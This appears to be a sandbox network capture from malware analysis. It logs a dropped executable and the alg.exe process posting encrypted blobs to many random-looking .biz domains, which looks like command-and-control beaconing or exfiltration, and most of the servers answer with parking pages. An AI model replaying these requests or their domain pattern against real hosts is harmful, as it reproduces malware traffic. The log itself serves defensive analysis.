                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.783554077 CET1236INData Raw: 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 2b 20 22 26 64 61 74 61 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 64 61 74 61 29 29 29 3b 7d 7d 2c 27 70 61 67 65 4c 6f 61
                                                                                                                                                                                                                                    Data Ascii: omponent(domain)+ "&data=" + encodeURIComponent(JSON.stringify(data)));}},'pageLoadedCallback': function (requestAccepted, status) {document.body.style.visibility = 'visible';pageLoadedCallbackTriggered = true;if ((status.faillisted === true |
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:13.788309097 CET1236INData Raw: 6d 65 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 6f 75 74 70 75 74 3d 68 74 6d 6c 26 64 72 69 64 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 70 61 67 65
                                                                                                                                                                                                                                    Data Ascii: me=" + encodeURIComponent(domain) + "&output=html&drid=" + encodeURIComponent(pageOptions.domainRegistrant));}}if (status.needsreview === true || status.needsreview == "true") {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(d


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    9192.168.2.44974918.141.10.107807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:14.148864985 CET357OUTPOST /tnupafomghuok HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: knjghuig.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:14.148880005 CET778OUTData Raw: 7b 5d 25 33 ca f6 0e a0 fe 02 00 00 c3 55 0c 9b ae d0 c1 e3 4d 8a cf 6b 9d 10 47 a0 16 e4 a6 07 ff 9e c7 96 c6 39 ee 2b b4 31 48 65 68 9e c0 4c c7 d2 bd 50 9b 11 bc 98 bd 84 e2 26 37 b1 ab b7 a1 c6 e9 c1 9f f5 55 a2 bb 6e 83 4e 9d d9 16 63 15 5e
                                                                                                                                                                                                                                    Data Ascii: {]%3UMkG9+1HehLP&7UnNc^YX2ku~V31coqnQ>%H'DzOZ7!n@N]3VMUy\}y:lx#Y{fBFC6i%eA)
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.509002924 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:15 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=636597c15fb1ebe7e5832361c5ce2f08|8.46.123.189|1735632315|1735632315|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    10192.168.2.44975082.112.184.197807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.711412907 CET351OUTPOST /yrkakyyuj HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:15.711412907 CET778OUTData Raw: 06 dc 0c 17 12 fc 21 b7 fe 02 00 00 87 05 57 67 70 30 d1 0a 5d 8d 6a 9c 00 76 0a 34 1c 60 6d e2 92 24 d0 60 58 af 06 db 1e cf a6 8c 66 ca 77 02 8a a7 a7 d0 dc 04 13 cf 66 2f 31 fa fd e4 9e 82 a8 13 3d 9a e9 74 6f 85 8f b8 8c cf 08 18 ef 81 fd 7e
                                                                                                                                                                                                                                    Data Ascii: !Wgp0]jv4`m$`Xfwf/1=to~0KQ};aJMQKWG531QO.iF6lmA\k4:aP[t5,$D6oel5x4OayBt3MM@t72FNM


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    11192.168.2.44975354.244.188.177807204C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:26.305097103 CET348OUTPOST /yos HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: pywolwnvd.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 812
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:26.305097103 CET812OUTData Raw: 1a c6 ea 76 95 e1 32 14 20 03 00 00 40 e7 7b b1 c8 42 39 56 d0 da 06 9c c9 13 61 85 28 43 5b 8b 5e a3 49 a5 1e d3 4c 09 37 b1 36 a2 ef 33 18 07 a5 ba 84 95 98 e0 f8 8b a0 6f d3 65 cb fe 72 24 ac b0 84 d2 10 39 17 8d 8d c6 e8 40 b1 c3 9d 03 b4 58
                                                                                                                                                                                                                                    Data Ascii: v2 @{B9Va(C[^IL763oer$9@XUR2:;'yW%OHwYWVp"a,p/ +tRXT["4/Q09?gavK7i[Yxb^1^fm@t+.qA
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:26.970252037 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:26 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=6aed37bc7c8851a4e73febe4c23e08ff|8.46.123.189|1735632326|1735632326|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    12192.168.2.44975418.141.10.107807204C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:27.254966974 CET353OUTPOST /snkwxvqngv HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: ssbzmoy.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 812
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:27.255022049 CET812OUTData Raw: 5b ea b6 9c fd d1 dd cf 20 03 00 00 c6 b5 0d 3c 4a f1 de 4f 9b 98 97 9b 32 85 18 38 15 b8 df ba 70 d2 f7 e8 c1 99 3f de e0 5e ef 1b 51 6d 48 97 80 fe 72 ee ee d8 8e 49 5b 4e 74 fe 1f 99 50 f4 f0 af e5 9f 98 20 ab f1 d2 d2 39 dc 50 c4 9f 9d cf 89
                                                                                                                                                                                                                                    Data Ascii: [ <JO28p?^QmHrI[NtP 9PiBS0/3C,k:;S=2FU4n9<MUcpDcpHNZ@n`M(ZIO*}4arMI.YARpPEfGV+=-S)fF{lov<
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:28.643241882 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:28 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=77c5807af2aef087a0bf567d51c47212|8.46.123.189|1735632328|1735632328|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    13192.168.2.44975554.244.188.177807204C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:28.717487097 CET346OUTPOST /wthge HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: cvgrf.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 812
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:28.717533112 CET812OUTData Raw: e4 84 d7 b7 41 14 74 3d 20 03 00 00 83 f0 46 88 c4 c5 ef ce 32 63 76 f1 e2 e7 1a 0c d2 da a2 ca 64 70 52 85 6f 5e ad 52 aa 01 2f a2 0e 7f d1 d1 f0 d0 02 68 6c 62 f4 d0 57 23 99 3b 88 d0 76 17 c2 58 3d 83 7e 22 6d e6 68 39 f7 51 63 3c 7b e1 49 dd
                                                                                                                                                                                                                                    Data Ascii: At= F2cvdpRo^R/hlbW#;vX=~"mh9Qc<{IZiBqoj?_"v7A$.Y8fQ+ZH[Vv?D@_uj*FV4;M{'^yXcqmHo2`rQy^Q6+`edq
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.413979053 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:29 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=c2d2d868bc2aefd064ef0dd8691495ae|8.46.123.189|1735632329|1735632329|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    14192.168.2.44975644.221.84.105807204C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.455081940 CET359OUTPOST /tloalmkxssnuris HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: npukfztj.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 812
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.455107927 CET812OUTData Raw: be 68 dd 93 e2 8f ef 06 20 03 00 00 98 1b b3 57 49 e8 bf ac f7 44 2c c7 10 4b 59 67 76 51 93 5c 8c af db f8 8c 9a 18 ea 01 b5 fa 73 1b 8d a0 d2 28 ac cb 6c c2 1e fa 77 7c a9 e1 d7 95 f5 c6 44 c3 14 59 06 d9 45 52 f4 e2 7d f4 19 1f dd 74 b9 21 1d
                                                                                                                                                                                                                                    Data Ascii: h WID,KYgvQ\s(lw|DYER}t!Yd2$ T_(z4VgHVdiDxnlI7W"Esux>eQFtM,=wqW)n2nv1hz"yAN%rd+1
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.910830975 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:29 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=06c88b09eab632a43c1fe24521a91b46|8.46.123.189|1735632329|1735632329|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    15192.168.2.44975772.52.178.23807204C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.935894012 CET350OUTPOST /ehlglgm HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: przvgke.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 812
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:29.935916901 CET812OUTData Raw: 36 04 ad 26 4f 43 8a ff 20 03 00 00 48 62 91 8a 01 42 0a 50 39 15 e7 e8 a8 57 1d c5 52 5f 4e 42 55 e2 5a cd c8 5f 4d 58 ff 9a a9 f5 ac 1c 06 cf 81 8a 9d 1f cb b6 81 2c 0b 54 7b 5c 9d 19 95 d5 2a 74 4a cc b9 d3 81 78 d7 12 da 4a f6 c4 ce 64 de d0
                                                                                                                                                                                                                                    Data Ascii: 6&OC HbBP9WR_NBUZ_MX,T{\*tJxJdGJFXk~QVoQ}06PmV6L~PEg/.S_j1AG@.6y{aj6/V:C8w0oFM36LGEn`S<?JA]ENRT*gC]H>d9j;
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:30.518603086 CET281INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:30 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Location: http://ww7.przvgke.biz/ehlglgm?usid=27&utid=10221870153
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    16192.168.2.44975882.112.184.197807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:37.351835012 CET356OUTPOST /htmlawrabimntg HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:37.351850986 CET778OUTData Raw: c2 0e 65 de 68 99 88 64 fe 02 00 00 24 99 9d 72 cd c4 ff ff 5d 7a 3d e7 1b 1e 94 a8 a9 69 88 db 42 c8 1d e8 3f ac ab ca 3b fd 0d 32 2f 6c 85 9e b5 59 02 df de a5 a1 60 5d 6c 2c 56 d3 cc 32 bf a7 22 01 1d 99 81 7e cf ad c0 31 fa 00 7c 6a 4d e4 ae
                                                                                                                                                                                                                                    Data Ascii: ehd$r]z=iB?;2/lY`]l,V2"~1|jMEE8:R]r4IHkYa`9x9rAMy":4xEew9C1=`)zJ{J{sMs/:{mq"@Z=Q8Y|'>/{Xp


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    17192.168.2.44975982.112.184.197807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:39.054828882 CET356OUTPOST /mxuujpbjwek HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:05:39.054912090 CET778OUTData Raw: de 2e 38 16 b7 98 5b cf fe 02 00 00 90 14 b5 1e a4 de 95 9c 12 61 2a 71 ca 60 12 22 e3 22 9f a1 0d f3 82 4a 15 c9 59 1d 1a 8d 4a a5 45 b8 03 a8 5a 58 5d 3e 4c 2b 1a c2 f0 3d 5c c2 95 5d b8 79 f4 71 ab e4 66 b9 26 9e 1f eb d6 13 65 b5 f7 42 84 4b
                                                                                                                                                                                                                                    Data Ascii: .8[a*q`""JYJEZX]>L+=\]yqf&eBK~@t5&"0gP0%)>vT]YdFE<S}Oe^#h]HF~mhy*7enl)'._ET.=ttz*,{~D:b


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    18192.168.2.44977382.112.184.197807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:00.557631969 CET347OUTPOST /ms HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:00.557656050 CET778OUTData Raw: 51 29 39 69 2b a1 fa f0 fe 02 00 00 12 cf e5 f4 7f dc 79 8f 84 62 6b 44 10 87 52 ba d5 9f a6 42 82 db 5e 4d 2b 0e 19 f4 d6 be fc cc 39 21 fe c3 f1 74 63 9d 85 db c7 3a 6a 55 38 18 dd 8d 14 6d 18 20 19 f2 ff 4f 0c 39 42 bf 97 da ae 82 25 ff cb 70
                                                                                                                                                                                                                                    Data Ascii: Q)9i+ybkDRB^M+9!tc:jU8m O9B%p|>9|=xa2Jkuw4TT%Kw6c u"d?~noB5o%H;2Km!|Vm-]fDfMJI[nF}O8;yA


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    19192.168.2.44978947.129.31.212807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:03.100650072 CET345OUTPOST /ld HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: xlfhhhm.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:03.100662947 CET778OUTData Raw: b4 3f e6 89 88 c0 aa ab fe 02 00 00 88 65 30 1b 62 a9 4c 7d 5f 86 6b 7b b2 de 59 4c 66 3c 97 e3 2a 76 f3 c5 6e 0e 6a c8 f8 22 3e f0 b3 f0 43 08 4c 6f a8 ba ab 3c 24 8a 76 5e c1 15 12 27 53 e6 56 b3 a4 33 c9 bc ea 44 58 74 82 16 6d f7 ef 1b b1 2d
                                                                                                                                                                                                                                    Data Ascii: ?e0bL}_k{YLf<*vnj">CLo<$v^'SV3DXtm-'PL!eoQq}xc#e])zw,|S}9D?/1*I}Q9tZ3I{>/jP~_}(9#wR3qdIG/rqY8XA
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:04.471400023 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:04 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=bf50e745d1263329bb9e7a9009c44c30|8.46.123.189|1735632364|1735632364|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    20192.168.2.44980013.251.16.150807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:05.049498081 CET357OUTPOST /kcogybxqholgdpl HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: ifsaia.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:05.049525023 CET778OUTData Raw: cc 17 b2 21 02 06 76 61 fe 02 00 00 35 19 65 74 86 57 84 c5 18 63 4d 8c 22 b3 ff 26 61 77 ba 1f 00 fc 31 8b 1f 73 d9 1a 88 a7 2c 13 a8 a6 55 a3 10 82 6d 3c a3 c2 13 e6 97 6d 62 4a 14 b9 7c 2a 96 d1 28 19 a2 bf e1 ce f5 79 14 f8 0b 58 63 fb b7 ff
                                                                                                                                                                                                                                    Data Ascii: !va5etWcM"&aw1s,Um<mbJ|*(yXc,oIzqy)^]'sp~zFI?E{'6%~J}hBj=nvM3@~xveA^~XbQ2P%O2&O%?:f
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:06.433348894 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:06 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=31efdc04e6706f82fe1ae223fff3a39d|8.46.123.189|1735632366|1735632366|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    21192.168.2.44981144.221.84.105807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.071906090 CET346OUTPOST /k HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: saytjshyf.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:07.071949959 CET778OUTData Raw: cd 4d a3 ce b4 fc a8 c8 fe 02 00 00 be 17 74 ab 20 f0 42 5d 0a b9 4f ed e3 15 8d fb 5b b1 cc a3 56 4a 6d 73 d8 c2 f7 fb e6 1b 98 91 84 4a 91 47 f8 fa dd 79 bd 5e 0a c3 2c 97 13 c6 19 7f 4d 76 4d c7 68 14 b4 19 3d 90 aa 53 62 ce c7 a6 44 82 18 4e
                                                                                                                                                                                                                                    Data Ascii: Mt B]O[VJmsJGy^,MvMh=SbDNk=Bz:9hEg$JbV/Tg}Elp|}i*cD M wdno,Fkld($fA[
